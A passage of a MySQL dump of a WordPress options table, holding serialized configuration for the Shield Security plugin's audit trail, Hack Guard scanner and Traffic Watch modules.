Count\'\";}}s:13:\"max_free_days\";i:7;s:22:\"audit_trail_table_name\";s:11:\"audit_trail\";s:6:\"events\";a:21:{s:16:\"plugin_activated\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:6:\"plugin\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_deactivated\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:6:\"plugin\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_file_edited\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:4:\"file\";}s:5:\"level\";s:7:\"warning\";}s:15:\"plugin_upgraded\";a:3:{s:12:\"audit_params\";a:3:{i:0;s:6:\"plugin\";i:1;s:4:\"from\";i:2;s:2:\"to\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:15:\"theme_activated\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:5:\"theme\";}s:5:\"level\";s:6:\"notice\";}s:17:\"theme_file_edited\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:4:\"file\";}s:5:\"level\";s:7:\"warning\";}s:14:\"theme_upgraded\";a:3:{s:12:\"audit_params\";a:3:{i:0;s:5:\"theme\";i:1;s:4:\"from\";i:2;s:2:\"to\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:12:\"core_updated\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:4:\"from\";i:1;s:2:\"to\";}s:5:\"level\";s:6:\"notice\";}s:20:\"permalinks_structure\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:4:\"from\";i:1;s:2:\"to\";}s:5:\"level\";s:7:\"warning\";}s:12:\"post_deleted\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:5:\"title\";}s:5:\"level\";s:7:\"warning\";s:14:\"audit_multiple\";b:1;}s:12:\"post_trashed\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"type\";}s:5:\"level\";s:7:\"warning\";s:14:\"audit_multiple\";b:1;}s:14:\"post_recovered\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"type\";}s:5:\"level\";s:4:\"info\";s:14:\"audit_multiple\";b:1;}s:12:\"post_updated\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"type\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:14:\"post_published\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"type\";}s:5:\"level\";s:6:\"notice\";s:14:\"audit_multiple\";b:1;}s:16:\"post_unpublished\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"type\";}s:5:\"level\";s:7:\"warning\";s:14:\"audit_multiple\";b:1;}s:10:\"user_login\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:7:\"warning\";}s:14:\"user_login_app\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:7:\"warning\";}s:15:\"user_registered\";a:2:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:5:\"email\";}s:5:\"level\";s:5:\"alert\";}s:12:\"user_deleted\";a:3:{s:12:\"audit_params\";a:2:{i:0;s:10:\"user_login\";i:1;s:5:\"email\";}s:5:\"level\";s:7:\"warning\";s:14:\"audit_multiple\";b:1;}s:23:\"user_deleted_reassigned\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:10:\"user_login\";}s:5:\"level\";s:6:\"notice\";}s:18:\"email_attempt_send\";a:3:{s:12:\"audit_params\";a:6:{i:0;s:2:\"to\";i:1;s:7:\"subject\";i:2;s:2:\"cc\";i:3;s:3:\"bcc\";i:4;s:7:\"bt_file\";i:5;s:7:\"bt_line\";}s:5:\"level\";s:4:\"info\";s:14:\"audit_multiple\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510340,'_site_transient_timeout_shield_mod_config_hack_protect','1632920474','no');
INSERT INTO `lwz_options` VALUES (510341,'_site_transient_shield_mod_config_hack_protect','a:9:{s:4:\"slug\";s:12:\"hack_protect\";s:10:\"properties\";a:14:{s:4:\"slug\";s:12:\"hack_protect\";s:4:\"name\";s:10:\"Hack Guard\";s:12:\"sidebar_name\";s:8:\"Scanners\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:12:\"hack_protect\";s:7:\"tagline\";s:63:\"Automatically detect and repair vulnerable and suspicious items\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:5:\"order\";i:70;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:5:\"wpcli\";a:1:{s:4:\"root\";s:10:\"hack_guard\";}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:5:\"Scans\";s:4:\"slug\";s:14:\"scans-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:14:\"scans-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:13:\"scans_results\";}}}s:8:\"sections\";a:7:{i:0;a:6:{s:4:\"slug\";s:18:\"section_file_guard\";s:7:\"primary\";b:1;s:5:\"title\";s:10:\"File Guard\";s:11:\"title_short\";s:10:\"File Guard\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:86:\"Purpose - Monitor WordPress files and protect against malicious intrusion and hacking.\";i:1;s:56:\"Recommendation - Keep the File Guard features turned on.\";}}i:1;a:5:{s:4:\"slug\";s:16:\"section_scan_wpv\";s:5:\"title\";s:21:\"Vulnerability Scanner\";s:11:\"title_short\";s:21:\"Vulnerability Scanner\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Regularly scan your WordPress plugins and themes for known security vulnerabilities.\";i:1;s:125:\"Recommendation - Ensure this is turned on and you will always know if any of your assets have known security vulnerabilities.\";}}i:2;a:5:{s:4:\"slug\";s:16:\"section_realtime\";s:5:\"title\";s:25:\"Realtime Change Detection\";s:11:\"title_short\";s:25:\"Realtime Change Detection\";s:9:\"beacon_id\";i:226;s:7:\"summary\";a:2:{i:0;s:85:\"Purpose - Monitor Your WordPress Site For Changes To Critical Components In Realtime.\";i:1;s:59:\"Recommendation - Keep The Realtime Change Detection Active.\";}}i:3;a:5:{s:4:\"slug\";s:16:\"section_scan_ufc\";s:5:\"title\";s:26:\"Unrecognised Files Scanner\";s:11:\"title_short\";s:26:\"Unrecognised Files Scanner\";s:9:\"beacon_id\";i:395;s:7:\"summary\";a:2:{i:0;s:84:\"Purpose - Scan your WordPress core folders for unrecognised files that don\'t belong.\";i:1;s:71:\"Recommendation - Keep the Unrecognised Files Scanner feature turned on.\";}}i:4;a:5:{s:4:\"slug\";s:20:\"section_scan_options\";s:5:\"title\";s:12:\"Scan Options\";s:11:\"title_short\";s:12:\"Scan Options\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:1:{i:0;s:54:\"Purpose - Set how often the Hack Guard scans will run.\";}}i:5;a:5:{s:4:\"slug\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:5:\"title\";s:25:\"Enable Module: Hack Guard\";s:11:\"title_short\";s:14:\"Disable Module\";s:9:\"beacon_id\";i:217;s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Hack Guard is a set of tools to warn you and protect you against hacks on your site.\";i:1;s:54:\"Recommendation - Keep the Hack Guard module turned on.\";}}i:6;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:21:{s:19:\"enable_hack_protect\";a:11:{s:3:\"key\";s:19:\"enable_hack_protect\";s:7:\"section\";s:51:\"section_enable_plugin_feature_hack_protection_tools\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf38\";s:9:\"link_blog\";s:19:\"https://shsec.io/9x\";s:9:\"beacon_id\";i:217;s:4:\"name\";s:17:\"Enable Hack Guard\";s:7:\"summary\";s:41:\"Enable (or Disable) The Hack Guard Module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the Hack Guard module\";}s:16:\"enabled_scan_apc\";a:10:{s:3:\"key\";s:16:\"enabled_scan_apc\";s:7:\"section\";s:16:\"section_scan_wpv\";s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/ew\";s:9:\"link_blog\";s:19:\"https://shsec.io/eo\";s:9:\"beacon_id\";i:225;s:4:\"name\";s:24:\"Abandoned Plugin Scanner\";s:7:\"summary\";s:35:\"Enable The Abandoned Plugin Scanner\";s:11:\"description\";s:66:\"Scan your WordPress.org assets for whether they\'ve been abandoned.\";}s:18:\"enable_wpvuln_scan\";a:11:{s:3:\"key\";s:18:\"enable_wpvuln_scan\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/du\";s:9:\"link_blog\";s:19:\"https://shsec.io/ah\";s:9:\"beacon_id\";i:137;s:4:\"name\";s:21:\"Vulnerability Scanner\";s:7:\"summary\";s:32:\"Enable The Vulnerability Scanner\";s:11:\"description\";s:66:\"Scan all your WordPress assets for known security vulnerabilities.\";}s:22:\"wpvuln_scan_autoupdate\";a:10:{s:3:\"key\";s:22:\"wpvuln_scan_autoupdate\";s:7:\"section\";s:16:\"section_scan_wpv\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Automatic Updates\";s:7:\"summary\";s:49:\"Apply Updates Automatically To Vulnerable Plugins\";s:11:\"description\";s:98:\"When an update becomes available, automatically apply updates to items with known vulnerabilities.\";}s:31:\"enable_core_file_integrity_scan\";a:10:{s:3:\"key\";s:31:\"enable_core_file_integrity_scan\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/hd\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:9:\"beacon_id\";i:224;s:4:\"name\";s:20:\"WP Core File Scanner\";s:7:\"summary\";s:56:\"Automatically Scans WordPress Core Files For Alterations\";s:11:\"description\";s:145:\"Compares all WordPress core files on your site against the official WordPress files. WordPress Core files should never be altered for any reason.\";}s:15:\"mal_scan_enable\";a:11:{s:3:\"key\";s:15:\"mal_scan_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/fp\";s:9:\"link_blog\";s:19:\"https://shsec.io/fx\";s:9:\"beacon_id\";i:222;s:4:\"name\";s:22:\"Automatic Malware Scan\";s:7:\"summary\";s:27:\"Enable Malware File Scanner\";s:11:\"description\";s:56:\"When enabled the Malware scanner will run automatically.\";}s:10:\"ptg_enable\";a:11:{s:3:\"key\";s:10:\"ptg_enable\";s:7:\"section\";s:18:\"section_file_guard\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/bl\";s:9:\"link_blog\";s:19:\"https://shsec.io/bm\";s:9:\"beacon_id\";i:133;s:4:\"name\";s:20:\"Enable/Disable Guard\";s:7:\"summary\";s:43:\"Enable The Guard For Plugin And Theme Files\";s:11:\"description\";s:90:\"When enabled the Guard will automatically scan for changes to your Plugin and Theme files.\";}s:11:\"file_locker\";a:12:{s:3:\"key\";s:11:\"file_locker\";s:7:\"section\";s:16:\"section_realtime\";s:7:\"premium\";b:1;s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:0:{}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:8:\"wpconfig\";s:4:\"text\";s:9:\"WP Config\";}i:1;a:2:{s:9:\"value_key\";s:13:\"root_htaccess\";s:4:\"text\";s:14:\"Root .htaccess\";}i:2;a:2:{s:9:\"value_key\";s:10:\"root_index\";s:4:\"text\";s:14:\"Root index.php\";}i:3;a:2:{s:9:\"value_key\";s:14:\"root_webconfig\";s:4:\"text\";s:15:\"Root Web.Config\";}}s:9:\"link_info\";s:19:\"https://shsec.io/h7\";s:9:\"link_blog\";s:19:\"https://shsec.io/h8\";s:9:\"beacon_id\";i:226;s:4:\"name\";s:11:\"File Locker\";s:7:\"summary\";s:40:\"Lock Files Against Tampering and Changes\";s:11:\"description\";s:97:\"As soon as changes are detected to any selected files, the contents may be examined and reverted.\";}s:17:\"file_repair_areas\";a:11:{s:3:\"key\";s:17:\"file_repair_areas\";s:7:\"section\";s:18:\"section_file_guard\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:2:{i:0;s:2:\"wp\";i:1;s:6:\"plugin\";}s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:2:\"wp\";s:4:\"text\";s:7:\"WP Core\";}i:1;a:2:{s:9:\"value_key\";s:6:\"plugin\";s:4:\"text\";s:12:\"Plugin Files\";}i:2;a:2:{s:9:\"value_key\";s:5:\"theme\";s:4:\"text\";s:11:\"Theme Files\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf36\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf37\";s:9:\"beacon_id\";i:228;s:4:\"name\";s:16:\"Auto File Repair\";s:7:\"summary\";s:45:\"Which Files Should Be Automatically Repaired?\";s:11:\"description\";s:80:\"When a file is modified, or malware is detected, Shield can try to repair files.\";}s:14:\"scan_frequency\";a:12:{s:3:\"key\";s:14:\"scan_frequency\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"1\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:8:{i:0;a:2:{s:9:\"value_key\";s:1:\"1\";s:4:\"text\";s:4:\"Once\";}i:1;a:2:{s:9:\"value_key\";s:1:\"2\";s:4:\"text\";s:24:\"Twice (scan every 12hrs)\";}i:2;a:2:{s:9:\"value_key\";s:1:\"3\";s:4:\"text\";s:25:\"3 Times (scan every 8hrs)\";}i:3;a:2:{s:9:\"value_key\";s:1:\"4\";s:4:\"text\";s:25:\"4 Times (scan every 6hrs)\";}i:4;a:2:{s:9:\"value_key\";s:1:\"6\";s:4:\"text\";s:25:\"6 Times (scan every 4hrs)\";}i:5;a:2:{s:9:\"value_key\";s:1:\"8\";s:4:\"text\";s:25:\"8 Times (scan every 3hrs)\";}i:6;a:2:{s:9:\"value_key\";s:2:\"12\";s:4:\"text\";s:26:\"12 Times (scan every 2hrs)\";}i:7;a:2:{s:9:\"value_key\";s:2:\"24\";s:4:\"text\";s:26:\"24 Times (scan every hour)\";}}s:9:\"link_info\";s:19:\"https://shsec.io/b2\";s:9:\"link_blog\";s:19:\"https://shsec.io/kd\";s:9:\"beacon_id\";i:223;s:4:\"name\";s:14:\"Scan Frequency\";s:7:\"summary\";s:60:\"Number Of Times To Automatically Scan Core Files In 24 Hours\";s:11:\"description\";s:85:\"Default: Once every 24hrs. To improve security, increase the number of scans per day.\";}s:37:\"enable_unrecognised_file_cleaner_scan\";a:11:{s:3:\"key\";s:37:\"enable_unrecognised_file_cleaner_scan\";s:7:\"section\";s:16:\"section_scan_ufc\";s:7:\"default\";s:19:\"enabled_report_only\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:23:\"Automatic Scan Disabled\";}i:1;a:2:{s:9:\"value_key\";s:19:\"enabled_report_only\";s:4:\"text\";s:26:\"Scan Enabled - Report Only\";}i:2;a:2:{s:9:\"value_key\";s:19:\"enabled_delete_only\";s:4:\"text\";s:41:\"Scan Enabled - Automatically Delete Files\";}}s:9:\"link_info\";s:19:\"https://shsec.io/9y\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:227;s:4:\"name\";s:26:\"Unrecognised Files Scanner\";s:7:\"summary\";s:45:\"Scans Core Directories For Unrecognised Files\";s:11:\"description\";s:128:\"Scans for, and automatically deletes, any files in your core WordPress folders that are not part of your WordPress installation.\";}s:16:\"ufc_scan_uploads\";a:11:{s:3:\"key\";s:16:\"ufc_scan_uploads\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/he\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:347;s:4:\"name\";s:12:\"Scan Uploads\";s:7:\"summary\";s:42:\"Scan Uploads Folder For PHP and Javascript\";s:11:\"description\";s:86:\"The Uploads folder is primarily for media, but could be used to store nefarious files.\";}s:14:\"ufc_exclusions\";a:11:{s:3:\"key\";s:14:\"ufc_exclusions\";s:7:\"section\";s:16:\"section_scan_ufc\";s:8:\"advanced\";b:1;s:7:\"default\";a:11:{i:0;s:9:\"error_log\";i:1;s:13:\"php_error_log\";i:2;s:9:\".htaccess\";i:3;s:9:\".htpasswd\";i:4;s:9:\".user.ini\";i:5;s:7:\"php.ini\";i:6;s:10:\"web.config\";i:7;s:12:\"php_mail.log\";i:8;s:8:\"mail.log\";i:9;s:35:\"wp-content/uploads/bb-plugin/cache/\";i:10;s:35:\"wp-content/uploads/cache/wpml/twig/\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/9z\";s:9:\"link_blog\";s:19:\"https://shsec.io/95\";s:9:\"beacon_id\";i:231;s:4:\"name\";s:15:\"File Exclusions\";s:7:\"summary\";s:52:\"Provide A List Of Files To Be Excluded From The Scan\";s:11:\"description\";s:89:\"Take a new line for each file you wish to exclude from the scan. No commas are necessary.\";}s:23:\"mal_autorepair_surgical\";a:10:{s:3:\"key\";s:23:\"mal_autorepair_surgical\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"N\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Surgical Auto-Repair\";s:7:\"summary\";s:55:\"Automatically Attempt To Surgically Remove Malware Code\";s:11:\"description\";s:58:\"Attempts to automatically remove code from infected files.\";}s:19:\"ptg_reinstall_links\";a:11:{s:3:\"key\";s:19:\"ptg_reinstall_links\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:1;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:19:\"https://shsec.io/bp\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:135;s:4:\"name\";s:21:\"Show Re-Install Links\";s:7:\"summary\";s:33:\"Show Re-Install Links For Plugins\";s:11:\"description\";s:78:\"Show links to re-install plugins and offer re-install when activating plugins.\";}s:19:\"auto_filter_results\";a:11:{s:3:\"key\";s:19:\"auto_filter_results\";s:7:\"section\";s:20:\"section_scan_options\";s:7:\"premium\";b:0;s:4:\"type\";s:8:\"checkbox\";s:7:\"default\";s:1:\"Y\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:439;s:4:\"name\";s:19:\"Auto-Filter Results\";s:7:\"summary\";s:48:\"Automatically Filter Results Of Irrelevant Items\";s:11:\"description\";s:60:\"Automatically remove items from results that are irrelevant.\";}s:20:\"scan_path_exclusions\";a:12:{s:3:\"key\";s:20:\"scan_path_exclusions\";s:7:\"section\";s:20:\"section_scan_options\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:10:{i:0;s:17:\"wp-content/cache/\";i:1;s:18:\"wp-content/nfwlog/\";i:2;s:18:\"wp-content/wflogs/\";i:3;s:11:\"*/error_log\";i:4;s:15:\"*/php_error_log\";i:5;s:10:\"*/mail.log\";i:6;s:14:\"*/php_mail.log\";i:7;s:23:\"*/.stylelintrc-css.json\";i:8;s:19:\"*/.stylelintrc.json\";i:9;s:14:\"*/sucuri-*.php\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:9:\"beacon_id\";i:441;s:4:\"name\";s:15:\"Scan Exclusions\";s:7:\"summary\";s:31:\"Scan File and Folder Exclusions\";s:11:\"description\";s:32:\"Scan File and Folder Exclusions.\";}s:14:\"scans_to_build\";a:6:{s:3:\"key\";s:14:\"scans_to_build\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:12:\"is_scan_cron\";a:6:{s:3:\"key\";s:12:\"is_scan_cron\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:7:\"boolean\";s:7:\"default\";b:0;}s:14:\"mal_fp_reports\";a:6:{s:3:\"key\";s:14:\"mal_fp_reports\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}s:16:\"filelocker_state\";a:6:{s:3:\"key\";s:16:\"filelocker_state\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:16:\"tracking_exclude\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:14:{s:14:\"all_scan_slugs\";a:6:{i:0;s:3:\"apc\";i:1;s:3:\"mal\";i:2;s:3:\"ptg\";i:3;s:3:\"wpv\";i:4;s:3:\"wcf\";i:5;s:3:\"ufc\";}s:20:\"file_scan_extensions\";a:11:{i:0;s:3:\"php\";i:1;s:4:\"php5\";i:2;s:4:\"php7\";i:3;s:2:\"js\";i:4;s:4:\"json\";i:5;s:3:\"css\";i:6;s:3:\"htm\";i:7;s:4:\"html\";i:8;s:3:\"svg\";i:9;s:4:\"twig\";i:10;s:3:\"hbs\";}s:10:\"db_classes\";a:3:{s:10:\"filelocker\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\FileLocker\\Handler\";s:7:\"scanner\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Scanner\\Handler\";s:5:\"scanq\";s:68:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\ScanQueue\\Handler\";}s:19:\"db_table_filelocker\";a:4:{s:4:\"slug\";s:10:\"filelocker\";s:14:\"has_updated_at\";b:1;s:11:\"cols_custom\";a:5:{s:4:\"file\";s:61:\"varchar(256) NOT NULL COMMENT \'File Path relative to ABSPATH\'\";s:13:\"hash_original\";s:54:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Original\'\";s:12:\"hash_current\";s:53:\"varchar(40) NOT NULL COMMENT \'SHA1 File Hash Current\'\";s:7:\"content\";s:28:\"MEDIUMBLOB COMMENT \'Content\'\";s:13:\"public_key_id\";s:52:\"TINYINT(2) UNSIGNED NOT NULL COMMENT \'Public Key ID\'\";}s:15:\"cols_timestamps\";a:3:{s:11:\"detected_at\";s:20:\"Change Last Detected\";s:11:\"reverted_at\";s:18:\"Reverted To Backup\";s:11:\"notified_at\";s:17:\"Notification Sent\";}}s:16:\"db_table_scanner\";a:3:{s:4:\"slug\";s:7:\"scanner\";s:11:\"cols_custom\";a:4:{s:4:\"hash\";s:58:\"varchar(32) NOT NULL DEFAULT \'\' COMMENT \'Unique Item Hash\'\";s:4:\"meta\";s:33:\"text COMMENT \'Relevant Item Data\'\";s:4:\"scan\";s:50:\"varchar(10) NOT NULL DEFAULT 0 COMMENT \'Scan Type\'\";s:8:\"severity\";s:44:\"int(3) NOT NULL DEFAULT 1 COMMENT \'Severity\'\";}s:15:\"cols_timestamps\";a:3:{s:10:\"ignored_at\";s:19:\"Scan Result Ignored\";s:11:\"notified_at\";s:21:\"Scan Notifiation Sent\";s:17:\"attempt_repair_at\";s:19:\"Attempted Repair At\";}}s:14:\"db_table_scanq\";a:3:{s:4:\"slug\";s:5:\"scanq\";s:11:\"cols_custom\";a:4:{s:4:\"scan\";s:50:\"varchar(3) NOT NULL DEFAULT \'\' COMMENT \'Scan Slug\'\";s:5:\"items\";s:34:\"text COMMENT \'Array of scan items\'\";s:7:\"results\";s:31:\"text COMMENT \'Array of results\'\";s:4:\"meta\";s:24:\"text COMMENT \'Meta Data\'\";}s:15:\"cols_timestamps\";a:2:{s:10:\"started_at\";s:12:\"Scan Started\";s:11:\"finished_at\";s:14:\"Scan Completed\";}}s:21:\"table_name_filelocker\";s:10:\"filelocker\";s:19:\"url_mal_sigs_simple\";s:96:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_raw.txt\";s:18:\"url_mal_sigs_regex\";s:95:\"https://raw.githubusercontent.com/scr34m/php-malware-scanner/master/definitions/patterns_re.txt\";s:23:\"default_whitelist_paths\";a:12:{i:0;s:18:\"wp-content/cache/*\";i:1;s:19:\"wp-content/shield/*\";i:2;s:26:\"wp-content/icwp/rollback/*\";i:3;s:35:\"wp-content/plugins-before-restore/*\";i:4;s:34:\"wp-content/themes-before-restore/*\";i:5;s:36:\"wp-content/uploads/bb-plugin/cache/*\";i:6;s:36:\"wp-content/uploads/cache/wpml/twig/*\";i:7;s:18:\"wp-content/cache/*\";i:8;s:11:\"*/error_log\";i:9;s:15:\"*/php_error_log\";i:10;s:10:\"*/mail.log\";i:11;s:14:\"*/php_mail.log\";}s:14:\"cron_all_scans\";s:9:\"all-scans\";s:14:\"wcf_exclusions\";a:5:{i:0;s:11:\"readme.html\";i:1;s:11:\"license.txt\";i:2;s:16:\"licens-sv_SE.txt\";i:3;s:20:\"wp-config-sample.php\";i:4;s:11:\"wp-content/\";}s:27:\"wcf_exclusions_missing_only\";a:2:{i:0;s:20:\"wp-admin/install.php\";i:1;s:10:\"xmlrpc.php\";}s:6:\"events\";a:5:{s:8:\"scan_run\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:4:\"scan\";}s:5:\"level\";s:5:\"debug\";s:14:\"audit_multiple\";b:1;}s:16:\"scan_items_found\";a:4:{s:12:\"audit_params\";a:2:{i:0;s:4:\"scan\";i:1;s:5:\"items\";}s:5:\"level\";s:5:\"alert\";s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:24:\"scan_item_repair_success\";a:3:{s:12:\"audit_params\";a:1:{i:0;s:9:\"path_full\";}s:14:\"audit_multiple\";b:1;s:6:\"recent\";b:1;}s:21:\"scan_item_repair_fail\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:9:\"path_full\";}s:14:\"audit_multiple\";b:1;}s:24:\"scan_item_delete_success\";a:2:{s:12:\"audit_params\";a:1:{i:0;s:9:\"path_full\";}s:14:\"audit_multiple\";b:1;}}}s:4:\"meta\";a:1:{s:6:\"ts_mod\";i:1632315670;}}','no'),(510342,'_site_transient_timeout_shield_mod_config_traffic','1632920474','no'),(510343,'_site_transient_shield_mod_config_traffic','a:8:{s:4:\"slug\";s:7:\"traffic\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"traffic\";s:4:\"name\";s:13:\"Traffic Watch\";s:12:\"sidebar_name\";s:7:\"Traffic\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"traffic\";s:7:\"tagline\";s:31:\"Watch All Requests To Your Site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:110;}s:10:\"menu_items\";a:1:{i:0;a:2:{s:5:\"title\";s:11:\"Traffic Log\";s:4:\"slug\";s:16:\"traffic-redirect\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:16:\"traffic-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:7:\"traffic\";}}}s:8:\"sections\";a:4:{i:0;a:6:{s:4:\"slug\";s:23:\"section_traffic_options\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Traffic Watch Options\";s:11:\"title_short\";s:7:\"Options\";s:9:\"beacon_id\";i:153;s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Provides finer control over the live traffic system.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:5:{s:4:\"slug\";s:23:\"section_traffic_limiter\";s:5:\"title\";s:21:\"Traffic Rate Limiting\";s:11:\"title_short\";s:13:\"Rate Limiting\";s:9:\"beacon_id\";i:420;s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Provides ability to restrict excessive requests from a single visitor.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:5:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_traffic\";s:5:\"title\";s:28:\"Enable Module: Traffic Watch\";s:11:\"title_short\";s:14:\"Disable 